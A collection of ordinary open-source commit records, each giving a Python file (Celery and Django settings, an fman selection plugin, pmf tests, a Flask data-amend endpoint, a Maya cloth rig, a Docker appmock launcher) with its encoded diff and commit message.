'visibility_timeout': 3600*12,
}
# all our tasks can be retried if the worker fails
CELERY_ACKS_LATE = True
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TIMEZONE = 'Africa/Johannesburg'
CELERY_ENABLE_UTC = True
CELERYBEAT_SCHEDULE = {
'fetch-yesterdays-feeds': {
'schedule': crontab(hour=1, minute=0),
'task': 'dexter.tasks.fetch_yesterdays_feeds',
},
'back-process-feeds': {
'schedule': crontab(hour=11, minute=0),
'task': 'dexter.tasks.back_process_feeds',
},
'fetch_yesterdays_feeds_rerun': {
'schedule': crontab(hour=12, minute=0),
'task': 'dexter.tasks.back_process_feeds',
},
# 'backfill-taxonomies': {
# 'schedule': crontab(hour=21, minute=0),
# 'task': 'dexter.tasks.backfill_taxonomies',
# },
}
|
Python
| 0.000002
|
@@ -634,17 +634,17 @@
ab(hour=
-1
+2
, minute
@@ -916,17 +916,17 @@
b(hour=1
-2
+5
, minute
|
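Decoded, the two one-character hunks move the schedule times: hour=1 becomes hour=2 for 'fetch-yesterdays-feeds', and hour=12 becomes hour=15 for 'fetch_yesterdays_feeds_rerun'. The affected entries then read (a reconstruction, not the verbatim new file):

'fetch-yesterdays-feeds': {
    'schedule': crontab(hour=2, minute=0),
    'task': 'dexter.tasks.fetch_yesterdays_feeds',
},
# ...
'fetch_yesterdays_feeds_rerun': {
    'schedule': crontab(hour=15, minute=0),
    'task': 'dexter.tasks.back_process_feeds',
},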
9a3d81d38e8b5885f54198f41b27d1d813c83e74
|
Add django_extensions
|
director/director/settings.py
|
director/director/settings.py
|
"""
Django settings for director project.
Uses ``django-configurations``. For more on this package, see
https://github.com/jazzband/django-configurations
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
from configurations import Configuration, values
class Common(Configuration):
"""
Configuration settings common to both development and production
"""
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'director.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'director.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
#
# Defaults to `db.sqlite3` but can be set using `DJANGO_DATABASE_URL` env var
# Note that the three leading slashes are *intentional*
# See https://github.com/kennethreitz/dj-database-url#url-schema
DATABASES = values.DatabaseURLValue(
'sqlite:///%s/db.sqlite3' % BASE_DIR,
environ_prefix='DJANGO' # For consistent naming with other env vars
)
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
# Can be set using `DJANGO_STATIC_URL` env var
STATIC_URL = values.Value('/static/')
class Dev(Common):
"""
Configuration settings used in development
"""
# Ensure debug is always true in development
DEBUG = True
# This variable must always be set, even in development.
SECRET_KEY = 'not-a-secret-key'
class Prod(Common):
"""
Configuration settings used in production
"""
# Ensure debug is always false in production
DEBUG = False
# Require that a `DJANGO_SECRET_KEY` environment
# variable is set during production
SECRET_KEY = values.SecretValue()
|
Python
| 0.000005
|
@@ -3695,16 +3695,145 @@
t-key'%0A%0A
+ # Additional apps only used in development%0A INSTALLED_APPS = Common.INSTALLED_APPS + %5B%0A 'django_extensions'%0A %5D%0A%0A
%0Aclass P
|
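Decoded, the hunk appends a development-only app list to the Dev configuration, matching the commit subject. The patched class reads roughly (a reconstruction):

class Dev(Common):
    """
    Configuration settings used in development
    """

    # Ensure debug is always true in development
    DEBUG = True

    # This variable must always be set, even in development.
    SECRET_KEY = 'not-a-secret-key'

    # Additional apps only used in development
    INSTALLED_APPS = Common.INSTALLED_APPS + [
        'django_extensions'
    ]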
c4f7f2025a6089ec0ddcb190eaf4c020804b384b
|
make the call to core commands more explicit
|
toggleselection/__init__.py
|
toggleselection/__init__.py
|
# Override commands that toggle item selection to automatically compute and instantly display
# combined filesize for selected files and the number of selected folders/files
from fman import DirectoryPaneListener, load_json
import json
from statusbarextended import StatusBarExtended
class CommandEmpty(): # to avoid duplicate command execution (and "return '', args" hangs)
def __call__(self):
pass
class SelectionOverride(DirectoryPaneListener):
def on_command(self, command_name, args):
if command_name in ('select_all'): # def ^A
self.pane.select_all()
self.show_selected_files()
return 'command_empty', args
elif command_name in ('deselect'): # def ^D
self.pane.clear_selection()
self.show_selected_files()
return 'command_empty', args
elif command_name in ( # commands that can pass a 'toggle_selection' argument
'move_cursor_down' , 'move_cursor_up' ,
'move_cursor_page_down', 'move_cursor_page_up',
'move_cursor_home' , 'move_cursor_end'):
if args.get('toggle_selection'): # select item → update statusbar → pass False arg
file_under_cursor = self.pane.get_file_under_cursor()
if file_under_cursor:
self.pane.toggle_selection(file_under_cursor)
self.show_selected_files()
new_args = dict(args)
new_args['toggle_selection'] = False
return command_name, new_args
def show_selected_files(self):
statusBarExtendedEnabled = load_json('StatusBarExtended.json')
if statusBarExtendedEnabled:
statusBarExtendedEnabledJson = json.loads(statusBarExtendedEnabled)
if statusBarExtendedEnabledJson['enabled'] == True:
StatusBarExtended.show_selected_files(self)
|
Python
| 0
|
@@ -202,398 +202,1371 @@
Pane
-Listener, load_json%0Aimport json%0Afrom statusbarextended import StatusBarExtended%0A%0Aclass CommandEmpty(): # to avoid duplicate command execution (and %22return '', args%22 hangs)%0A def __call__(self):%0A pass%0A%0Aclass SelectionOverride(DirectoryPaneListener):%0A def on_command(self, command_name, args):%0A if command_name in ('select_all'): # def %5EA%0A self.pane.select_all()
+Command, DirectoryPaneListener, load_json, save_json, PLATFORM%0Afrom core.commands.util import is_hidden%0Afrom fman.url import splitscheme%0Aimport json%0Afrom statusbarextended import StatusBarExtended%0A%0Aclass _CorePaneCommand(DirectoryPaneCommand): # copy from core/commands/__init__.py%0A def select_all(self):%0A self.pane.select_all()%0A def deselect( self):%0A self.pane.clear_selection()%0A%0A def move_cursor_down( self, toggle_selection=False):%0A self.pane.move_cursor_down( toggle_selection)%0A def move_cursor_up( self, toggle_selection=False):%0A self.pane.move_cursor_up( toggle_selection)%0A def move_cursor_page_up( self, toggle_selection=False):%0A self.pane.move_cursor_page_up( toggle_selection)%0A def move_cursor_page_down(self, toggle_selection=False):%0A self.pane.move_cursor_page_down(toggle_selection)%0A def move_cursor_home( self, toggle_selection=False):%0A self.pane.move_cursor_home( toggle_selection)%0A def move_cursor_end( self, toggle_selection=False):%0A self.pane.move_cursor_end( toggle_selection)%0A%0Aclass CommandEmpty(): # to avoid duplicate command execution (and %22return '', args%22 hangs)%0A def __call__(self):%0A pass%0A%0Aclass SelectionOverride(DirectoryPaneListener):%0A def on_command(self, command_name, args):
%0A
@@ -1672,16 +1672,43 @@
ame in (
+%0A 'select_all',
'deselec
@@ -1715,17 +1715,8 @@
t'):
- # def %5ED
%0A
@@ -1728,34 +1728,52 @@
-self.pane.clear_selection(
+getattr(_CorePaneCommand, command_name)(self
)%0A
@@ -2129,268 +2129,60 @@
-if args.get('toggle_selection'): # select item %E2%86%92 update statusbar %E2%86%92 pass False arg%0A file_under_cursor = self.pane.get_file_under_cursor()%0A if file_under_cursor:%0A self.pane.toggle_selection(file_under_cursor)%0A
+getattr(_CorePaneCommand, command_name)(self, args)%0A
@@ -2185,29 +2185,24 @@
-
self.show_se
@@ -2220,115 +2220,8 @@
s()%0A
- new_args = dict(args)%0A new_args%5B'toggle_selection'%5D = False%0A
@@ -2235,24 +2235,25 @@
return
+'
command_
name, ne
@@ -2248,18 +2248,16 @@
and_
-name, new_
+empty',
args
|
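The large hunks above are easier to follow decoded: the listener stops reimplementing selection logic and instead delegates to verbatim copies of the core commands via getattr. A condensed reconstruction of the patched file (some analogous methods elided; note that in the move-cursor branch the args dict is passed straight through as the toggle_selection argument):

from fman import DirectoryPaneCommand, DirectoryPaneListener, load_json, save_json, PLATFORM
from core.commands.util import is_hidden
from fman.url import splitscheme
import json
from statusbarextended import StatusBarExtended

class _CorePaneCommand(DirectoryPaneCommand): # copy from core/commands/__init__.py
    def select_all(self):
        self.pane.select_all()
    def deselect(self):
        self.pane.clear_selection()
    def move_cursor_down(self, toggle_selection=False):
        self.pane.move_cursor_down(toggle_selection)
    # ... move_cursor_up / _page_up / _page_down / _home / _end are analogous

class SelectionOverride(DirectoryPaneListener):
    def on_command(self, command_name, args):
        if command_name in (
            'select_all', 'deselect'):
            getattr(_CorePaneCommand, command_name)(self)
            self.show_selected_files()
            return 'command_empty', args
        elif command_name in ( # commands that can pass a 'toggle_selection' argument
            'move_cursor_down' , 'move_cursor_up' ,
            'move_cursor_page_down', 'move_cursor_page_up',
            'move_cursor_home' , 'move_cursor_end'):
            getattr(_CorePaneCommand, command_name)(self, args)
            self.show_selected_files()
            return 'command_empty', args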
88a4c124fc1e1ee0b77771ebb63055e51396d779
|
Add unittest for perturb on many pmfs.
|
dit/math/tests/test_pmfops.py
|
dit/math/tests/test_pmfops.py
|
# coding: utf-8
from __future__ import division
from __future__ import print_function
import dit
import numpy as np
from nose.tools import *
module = dit.math.pmfops
def test_perturb():
# Smoke test
d = np.array([0, .5, .5])
d2 = module.perturb(d, .00001)
d3 = d2.round(2)
np.testing.assert_allclose(d, d3)
def test_convex_combination():
d1 = np.array([0, .5, .5])
d2 = np.array([.5, .5, 0])
d3_= np.array([.25, .5, .25])
d3 = module.convex_combination(np.array([d1, d2]))
np.testing.assert_allclose(d3, d3_)
def test_convex_combination_weights():
d1 = np.array([0, .5, .5])
d2 = np.array([.5, .5, 0])
weights = [1, 0]
d3 = module.convex_combination(np.array([d1, d2]), weights)
np.testing.assert_allclose(d3, d1)
def test_downsample_onepmf():
# One pmf
d1 = np.array([0, .51, .49])
d2_ = np.array([0, .5, .5])
d2 = module.downsample(d1, 1)
np.testing.assert_allclose(d2, d2_)
def test_downsample_twopmf():
# Two pmf
d1 = np.array([[0, .51, .49], [.6, .3, .1]])
d2_ = np.array([[0, .5, .5], [.5, .5, 0]])
d2 = module.downsample(d1, 1)
np.testing.assert_allclose(d2, d2_)
def test_downsample_badmethod():
d1 = np.array([0, .51, .49])
assert_raises(
NotImplementedError, module.downsample, d1, 3, method='whatever'
)
def test_projections1():
d = np.array([ 0.03231933, 0.89992681, 0.06775385])
d2_ = np.array([
[ 0.03231933, 0.89992681, 0.06775385],
[ 0. , 0.92998325, 0.07001675],
[ 0. , 0.875 , 0.125 ]
])
d2 = module.projections(d, 3)
np.testing.assert_allclose(d2, d2_)
def test_projections2():
d = np.array([ 0.51, 0.48, 0.01])
d2_ = np.array([
[ 0.51 , 0.48 , 0.01 ],
[ 0.5 , 0.48979592, 0.01020408],
[ 0.5 , 0.5 , 0. ]
])
d2 = module.projections(d, 3)
np.testing.assert_allclose(d2, d2_, rtol=1e-7, atol=1e-8)
def test_clamps():
d = np.array([.51, .48, .01])
out_ = (np.array([[4, 3, 0], [5, 4, 1]]),
np.array([ 0., 0.125, 0.25, 0.375, 0.5, 0.625, 0.75, 0.875, 1.]))
out = module.clamped_indexes(d, 3)
np.testing.assert_allclose(out[0], out_[0])
np.testing.assert_allclose(out[1], out_[1], rtol=1e-7, atol=1e-8)
|
Python
| 0
|
@@ -180,16 +180,20 @@
_perturb
+_one
():%0A
@@ -330,16 +330,213 @@
d, d3)%0A%0A
+def test_perturb_many():%0A # Smoke test%0A d = np.array(%5B%5B0, .5, .5%5D, %5B.5, .5, .0%5D%5D)%0A d2 = module.perturb(d, .00001)%0A print(d2)%0A d3 = d2.round(2)%0A np.testing.assert_allclose(d, d3)%0A%0A
def test
|
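Decoded, the hunks rename test_perturb to test_perturb_one and add the many-pmf smoke test named in the commit subject (a reconstruction):

def test_perturb_one():
    # Smoke test
    d = np.array([0, .5, .5])
    d2 = module.perturb(d, .00001)
    d3 = d2.round(2)
    np.testing.assert_allclose(d, d3)

def test_perturb_many():
    # Smoke test
    d = np.array([[0, .5, .5], [.5, .5, .0]])
    d2 = module.perturb(d, .00001)
    print(d2)
    d3 = d2.round(2)
    np.testing.assert_allclose(d, d3)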
50eedeaaa401d192c2681d58c83981961a1c4ff1
|
fix update profile
|
lxxl/services/graph/users/profile.py
|
lxxl/services/graph/users/profile.py
|
from lxxl.lib import router, output
from lxxl.lib.app import Controller, Error
from lxxl.lib.storage import Db, ASCENDING
from lxxl.lib.flush import FlushRequest
from lxxl.model.users import User, Factory as UserFactory, Duplicate
import datetime
class Profile(router.Root):
def get(self, environ, params):
try:
Controller().checkToken()
#relation = Controller().getRelation()
me = Controller().getUid()
# fix privacy
# if relation < 1:
# output.error('#ApiKeyUnauthorized', 403)
user = UserFactory.get(params['uid'])
if not user:
output.error('unknown user', 404)
#XXX uncomment me ?
# if user.activate == 0:
# output.error('unactivated user', 404)
result = {}
Db().get('profile').ensure_index(
[('uid', ASCENDING)], {'background': True})
profile = Db().get('profile').find_one({'uid': params['uid']})
if not profile:
profile = {}
profile['datas'] = {}
result['profile'] = profile['datas']
result['email'] = user.email
result['username'] = user.username
if user.premium:
result['premium'] = True
if user.hasAvatar is True:
result['hasAvatar'] = True
else:
result['hasAvatar'] = False
result['friends'] = user.friends_count
output.success(result, 200)
except Error:
pass
return Controller().getResponse(True)
def set(self, environ, params):
try:
Controller().checkToken()
#relation = Controller().getRelation()
me = Controller().getUid()
apikey = Controller().getApiKey()
if Controller().getApiType() != 1:
output.error('Not your api business', 403)
# if relation != 2:
# output.error(
# '#ApiKeyUnauthorized : none of your business', 403)
user = UserFactory.get(params['uid'])
if not user:
output.error('unknown user', 404)
data = Controller().getPostJson()
if not data:
output.error('bad json format', 400)
Db().get('profile').update({'uid': me}, {
'datas': data,
'uid': me,
'updated': datetime.datetime.utcnow()
}, True)
output.success('profile updated', 200)
except Error:
pass
return Controller().getResponse(True)
|
Python
| 0.000001
|
@@ -2292,18 +2292,22 @@
.get
-PostJ
+Request().j
son
-()
%0A%0A
|
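Decoded, the single hunk swaps the accessor used in Profile.set (a reconstruction):

# before
data = Controller().getPostJson()
# after
data = Controller().getRequest().json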
9a4e2f88eba716ef607b8c476509cac5e58475f7
|
Update mapper_lowercase.py
|
mapreduce/filter/mapper_lowercase.py
|
mapreduce/filter/mapper_lowercase.py
|
#!/usr/bin/env python
import sys
# Open just for read
dbpediadb = set(open('dbpedia_labels.txt').read().splitlines())
dbpediadb_lower = set(x.lower() for x in open('dbpedia_labels.txt').read().splitlines())
for line in sys.stdin:
# remove leading and trailing whitespace
line = line.strip()
# split the line into words
ngram, num = line.split('\t')
if ngram in dbpediadb:
print '%s\t%s|--|%s' % (ngram.lower(), ngram.replace(' ', '_'), num)
if ngram in dbpediadb_lower:
print '%s\t%s|--|%s' % (ngram.lower(), 'lower', num)
|
Python
| 0.000067
|
@@ -470,32 +470,40 @@
um)%0A if ngram
+.lower()
in dbpediadb_lo
|
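Decoded, the fix lowercases the ngram before the second membership test; previously the original-case ngram was compared against the lowercased set and mixed-case entries could never match (a reconstruction):

# before
if ngram in dbpediadb_lower:
# after
if ngram.lower() in dbpediadb_lower: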
84ce27775b7e04955a15a0eb1e277db3e447b81f
|
fix SlidingCloth
|
mayaLib/rigLib/utils/slidingCloth.py
|
mayaLib/rigLib/utils/slidingCloth.py
|
__author__ = 'Lorenzo Argentieri'
import pymel.core as pm
from mayaLib.rigLib.utils import skin
from mayaLib.rigLib.utils import deform
class SlidingCloth():
def __init__(self, mainSkinGeo, proxySkinGeo, mainClothGeo, proxyClothGeo):
"""
Setup Sliding Cloth deformation
:param mainSkinGeo: str
:param proxySkinGeo: str
:param mainClothGeo: str
:param proxyClothGeo: str
"""
if mainSkinGeo and mainClothGeo:
self.mainSkinGeo = pm.ls(mainSkinGeo)[0]
self.mainClothGeo = pm.ls(mainClothGeo)[0]
else:
print 'No valid Geo!'
if proxySkinGeo:
self.proxySkinGeo = pm.ls(proxySkinGeo)[0]
else:
print 'Make Skin proxy Geo!'
if proxyClothGeo:
self.proxyClothGeo = pm.ls(proxyClothGeo)[0]
else:
print 'Make Cloth proxy GEO!'
# setup skin proxy geo
skin.copyBind(self.mainSkinGeo, self.proxySkinGeo)
# setup cloth proxy geo
skin.copyBind(self.mainSkinGeo, self.proxyClothGeo)
cMuscleDeformer = deform.cMuscleSystemDeformer(self.proxyClothGeo)
cMuscleDeformer.enableRelax.set(1)
cMuscleDeformer.relaxCompress.set(10)
cMuscleDeformer.enableSmooth.set(1)
shrinkWrapDeformer = deform.shrinkWrapDeformer(self.proxyClothGeo, self.proxySkinGeo)
shrinkWrapDeformer.shapePreservationEnable.set(1)
polySmoothDeformer = pm.polySmooth(self.proxyClothGeo)[0]
# wrap main Cloth Geo
wrapDeformer = deform.wrapDeformer(self.mainClothGeo, self.proxyClothGeo)
|
Python
| 0.000001
|
@@ -231,16 +231,34 @@
ClothGeo
+, rigModelGrp=None
):%0A
@@ -1626,28 +1626,290 @@
lothGeo, self.proxyClothGeo)
+%0A baseObj = pm.listConnections(wrapDeformer.basePoints, source=True)%5B0%5D%0A if rigModelGrp:%0A pm.parent(baseObj, rigModelGrp)%0A%0A # save attribute%0A self.baseObj = baseObj%0A%0A def getWrapBaseObj(self):%0A return self.baseObj
|
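Decoded, the hunks add an optional rigModelGrp argument and expose the wrap deformer's base object (a condensed reconstruction; unchanged setup elided):

def __init__(self, mainSkinGeo, proxySkinGeo, mainClothGeo, proxyClothGeo, rigModelGrp=None):
    # ... unchanged setup elided ...
    wrapDeformer = deform.wrapDeformer(self.mainClothGeo, self.proxyClothGeo)
    baseObj = pm.listConnections(wrapDeformer.basePoints, source=True)[0]
    if rigModelGrp:
        pm.parent(baseObj, rigModelGrp)

    # save attribute
    self.baseObj = baseObj

def getWrapBaseObj(self):
    return self.baseObj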
b99c839eac306ccd4e73a53bc45bef3be46f99a8
|
clean up amend data
|
meerkat_nest/resources/amend_data.py
|
meerkat_nest/resources/amend_data.py
|
"""
Data resource for upload data
"""
from flask_restful import Resource
from flask import request
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import json
import os
import uuid
import datetime
from pprint import pprint
from meerkat_nest import model
from meerkat_nest import config
from meerkat_nest.util import scramble, format_form_field_key, validate_request, raw_odk_data_to_dict
from meerkat_nest import message_service
db_url = os.environ['MEERKAT_NEST_DB_URL']
engine = create_engine(db_url)
class amendData(Resource):
"""
Receives JSON data and amends an existing entry in Meerkat DB
Returns:\n
HTTP return code\n
"""
#decorators = [authenticate]
def get(self):
return "amend data GET"
def post(self):
logging.info("received amend request")
logging.info(str(request.headers))
data_entry = request.get_json()
logging.info(str(data_entry))
try:
validate_request(data_entry)
except AssertionError as e:
logging.error("Input was not a valid Meerkat Nest JSON object: " + e.args[0])
return Response(json.dumps({"message":("Input was not a valid Meerkat Nest JSON object: " + e.args[0])}),
status=400,
mimetype='application/json')
try:
new_row = amend_raw_data(data_entry)
except AssertionError as e:
logging.error("No record with uuid " + data_entry['uuid'] + " found")
return Response(json.dumps({"message":"No record with uuid " + data_entry['uuid'] + " found"}),
status=400,
mimetype='application/json')
except Exception as e:
logging.error("Error in uploading data: " + e.args[0])
return Response(json.dumps({"message": "Error in uploading data: " + e.args[0]}),
status=502,
mimetype='application/json')
try:
processed_data_entry = process(data_entry)
except AssertionError as e:
logging.error("Data type '" + data_entry['formId'] + "' is not supported for input type '" + data_entry['content'] + "'")
return Response(json.dumps({"message":"Data type '" + data_entry['formId'] + "' is not supported for input type '" + data_entry['content'] + "'"}),
status=400,
mimetype='application/json')
try:
sent = message_service.send_data(processed_data_entry)
except AssertionError as e:
logging.error("Error in forwarding data to message queue: " + str(e))
return Response(json.dumps({"message":"Error in forwarding data to message queue: " + str(e)}),
status=502,
mimetype='application/json')
logging.warning("processed amend request")
return processed_data_entry
def amend_raw_data(data_entry):
"""
Amends raw data in Meerkat Nest database
Returns:\n
uuid for the PK of the raw data row\n
"""
assert(data_entry['content'] in ['form'])
if data_entry['content'] == 'form':
Session = sessionmaker(bind=engine)
session = Session()
old_row_query = session.query(model.rawDataOdkCollect)\
.filter(model.rawDataOdkCollect.uuid == data_entry['uuid']).all()
assert len(old_row_query) == 1, "No record with uuid " + data_entry['uuid'] + " found"
old_row = old_row_query[0]
new_uuid = str(uuid.uuid4())
timestamp_now = datetime.datetime.now()
archived_row = model.rawDataOdkCollectArchive(
uuid = data_entry['uuid'],
active_uuid = new_uuid,
received_on = old_row.received_on,
active_from = old_row.active_from,
active_until = timestamp_now,
authentication_token = old_row.authentication_token,
content = old_row.content,
formId = old_row.formId,
formVersion = old_row.formVersion,
data = old_row.data
)
new_row = model.rawDataOdkCollect(
uuid = new_uuid,
received_on = old_row.received_on,
active_from = timestamp_now,
authentication_token = data_entry['token'],
content = data_entry['content'],
formId = data_entry['formId'],
formVersion = data_entry['formVersion'],
data = data_entry['data']
)
try:
session.add(archived_row)
session.delete(old_row)
session.add(new_row)
session.commit()
session.flush()
except Exception as e:
raise
return new_row
|
Python
| 0.000019
|
@@ -91,16 +91,26 @@
request
+, Response
%0Afrom sq
@@ -233,33 +233,22 @@
ime%0A
-from pprint
import
-pprint
+logging
%0A%0Afr
@@ -2818,36 +2818,68 @@
-status=502,%0A
+ status=502,%0A
@@ -3008,16 +3008,17 @@
_entry%0A%0A
+%0A
def amen
@@ -3264,23 +3264,29 @@
-S
+s
ession
+_maker
= sessi
@@ -3328,15 +3328,21 @@
n =
-S
+s
ession
+_maker
()%0A
@@ -3380,25 +3380,25 @@
query(model.
-r
+R
awDataOdkCol
@@ -3426,25 +3426,25 @@
ilter(model.
-r
+R
awDataOdkCol
@@ -3723,33 +3723,33 @@
ved_row = model.
-r
+R
awDataOdkCollect
@@ -3752,15 +3752,8 @@
lect
-Archive
(%0A
@@ -3770,29 +3770,21 @@
uuid
- = data_entry%5B'
+=old_row.
uuid
-'%5D
,%0A
@@ -3800,27 +3800,25 @@
active_uuid
- =
+=
new_uuid,%0A
@@ -3830,35 +3830,33 @@
received_on
- =
+=
old_row.received
@@ -3883,19 +3883,17 @@
ive_from
- =
+=
old_row.
@@ -3929,19 +3929,17 @@
ve_until
- =
+=
timestam
@@ -3977,19 +3977,17 @@
on_token
- =
+=
old_row.
@@ -4027,19 +4027,17 @@
content
- =
+=
old_row.
@@ -4063,19 +4063,17 @@
formId
- =
+=
old_row.
@@ -4103,19 +4103,17 @@
mVersion
- =
+=
old_row.
@@ -4141,19 +4141,17 @@
data
- =
+=
old_row.
@@ -4190,17 +4190,17 @@
= model.
-r
+R
awDataOd
|
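The many small hunks above are mostly mechanical. Decoded, the cleanup: imports Response and logging (dropping pprint), fixes the indentation of a status=502 keyword, renames Session to session_maker, capitalizes the model class to RawDataOdkCollect (the archive row loses its Archive suffix), archives with uuid=old_row.uuid instead of re-reading the request payload, and normalizes keyword spacing to key=value. Key lines after the patch (a condensed reconstruction):

from flask import request, Response
import logging

def amend_raw_data(data_entry):
    # ...
    session_maker = sessionmaker(bind=engine)
    session = session_maker()
    old_row_query = session.query(model.RawDataOdkCollect)\
        .filter(model.RawDataOdkCollect.uuid == data_entry['uuid']).all()
    # ...
    archived_row = model.RawDataOdkCollect(
        uuid=old_row.uuid,
        active_uuid=new_uuid,
        # ... remaining keyword arguments keep their old values, now written key=value
    )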
990330ce9bf3cb9cc63d1287f49f04f1a7fe2cf0
|
fix mocked_app parameter not being optional
|
docker/environment/appmock.py
|
docker/environment/appmock.py
|
# coding=utf-8
"""Authors: Łukasz Opioła, Konrad Zemek
Copyright (C) 2015 ACK CYFRONET AGH
This software is released under the MIT license cited in 'LICENSE.txt'
Brings up a set of appmock instances.
"""
import copy
import json
import os
import random
import string
from . import common, docker, dns, provider_ccm, provider_worker, globalregistry
APPMOCK_WAIT_FOR_NAGIOS_SECONDS = 60 * 2
def domain(appmock_instance, uid):
"""Formats domain for an appmock instance.
It is intended to fake OP or GR domain.
"""
return common.format_hostname(appmock_instance, uid)
def appmock_hostname(node_name, uid):
"""Formats hostname for a docker hosting appmock.
NOTE: Hostnames are also used as docker names!
"""
return common.format_hostname(node_name, uid)
def appmock_erl_node_name(node_name, uid):
"""Formats erlang node name for a vm on appmock docker.
"""
hostname = appmock_hostname(node_name, uid)
return common.format_erl_node_name('appmock', hostname)
def _tweak_config(config, appmock_node, appmock_instance, uid):
cfg = copy.deepcopy(config)
cfg['nodes'] = {'node': cfg['nodes'][appmock_node]}
mocked_app = 'none'
if 'mocked_app' in cfg['nodes']['node']:
mocked_app = cfg['nodes']['node']['mocked_app']
# Node name depends on the mocked app; if none is specified,
# the default appmock_erl_node_name will be used.
node_name = {
'op_ccm': provider_ccm.ccm_erl_node_name(appmock_node,
appmock_instance, uid),
'op_worker': provider_worker.worker_erl_node_name(appmock_node,
appmock_instance,
uid),
'globalregistry': globalregistry.gr_erl_node_name(appmock_node,
appmock_instance, uid)
}.get(mocked_app, appmock_erl_node_name(appmock_node, uid))
if 'vm.args' not in cfg['nodes']['node']:
cfg['nodes']['node']['vm.args'] = {}
vm_args = cfg['nodes']['node']['vm.args']
vm_args['name'] = node_name
# If cookie is not specified, set random cookie
# so the node does not try to connect to others
if 'setcookie' not in vm_args:
vm_args['setcookie'] = ''.join(
random.sample(string.ascii_letters + string.digits, 16))
return cfg
def _node_up(image, bindir, config, config_path, dns_servers, logdir):
node_name = config['nodes']['node']['vm.args']['name']
(name, sep, hostname) = node_name.partition('@')
sys_config = config['nodes']['node']['sys.config']
# can be an absolute path or relative to gen_dev_args.json
app_desc_file_path = sys_config['app_description_file']
app_desc_file_name = os.path.basename(app_desc_file_path)
app_desc_file_path = os.path.join(common.get_file_dir(config_path),
app_desc_file_path)
# file_name must be preserved as it must match the Erlang module name
sys_config['app_description_file'] = '/tmp/' + app_desc_file_name
command = '''set -e
cat <<"EOF" > /tmp/{app_desc_file_name}
{app_desc_file}
EOF
cat <<"EOF" > /tmp/gen_dev_args.json
{gen_dev_args}
EOF
escript bamboos/gen_dev/gen_dev.escript /tmp/gen_dev_args.json
/root/bin/node/bin/appmock console'''
command = command.format(
app_desc_file_name=app_desc_file_name,
app_desc_file=open(app_desc_file_path, 'r').read(),
gen_dev_args=json.dumps({'appmock': config}))
volumes = [(bindir, '/root/build', 'ro')]
if logdir:
logdir = os.path.join(os.path.abspath(logdir), hostname)
volumes.extend([(logdir, '/root/bin/node/log', 'rw')])
container = docker.run(
image=image,
name=hostname,
hostname=hostname,
detach=True,
interactive=True,
tty=True,
workdir='/root/build',
volumes=volumes,
dns_list=dns_servers,
command=command)
return container, {
'docker_ids': [container],
'appmock_nodes': [node_name]
}
def _ready(node):
node_ip = docker.inspect(node)['NetworkSettings']['IPAddress']
return common.nagios_up(node_ip, '9999')
def up(image, bindir, dns_server, uid, config_path, logdir=None):
config = common.parse_json_file(config_path)
input_dir = config['dirs_config']['appmock']['input_dir']
dns_servers, output = dns.maybe_start(dns_server, uid)
for appmock_instance in config['appmock_domains']:
gen_dev_cfg = {
'config': {
'input_dir': input_dir,
'target_dir': '/root/bin'
},
'nodes': config['appmock_domains'][appmock_instance]['appmock']
}
tweaked_configs = [_tweak_config(gen_dev_cfg, appmock_node,
appmock_instance, uid)
for appmock_node in gen_dev_cfg['nodes']]
include_domain = False
appmock_ips = []
appmocks = []
for cfg in tweaked_configs:
appmock_id, node_out = _node_up(image, bindir, cfg,
config_path, dns_servers, logdir)
appmocks.append(appmock_id)
mocked_app = cfg['nodes']['node']['mocked_app']
if mocked_app == 'op_worker' or mocked_app == 'globalregistry':
include_domain = True
appmock_ips.append(common.get_docker_ip(appmock_id))
common.merge(output, node_out)
common.wait_until(_ready, appmocks, APPMOCK_WAIT_FOR_NAGIOS_SECONDS)
if include_domain:
domains = {
'domains': {
domain(appmock_instance, uid): {
'ns': [],
'a': appmock_ips
}
}
}
common.merge(output, domains)
# Make sure domains are added to the dns server
dns.maybe_restart_with_configuration(dns_server, uid, output)
return output
|
Python
| 0.000002
|
@@ -5266,24 +5266,81 @@
appmock_id)%0A
+ if 'mocked_app' in cfg%5B'nodes'%5D%5B'node'%5D:%0A
@@ -5387,16 +5387,20 @@
d_app'%5D%0A
+
@@ -5475,32 +5475,36 @@
+
include_domain =
@@ -5509,16 +5509,20 @@
= True%0A
+
|
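Decoded, the fix wraps the unconditional dict access in a guard so that 'mocked_app' is truly optional, as the commit subject says (a reconstruction of the patched loop body):

appmocks.append(appmock_id)
if 'mocked_app' in cfg['nodes']['node']:
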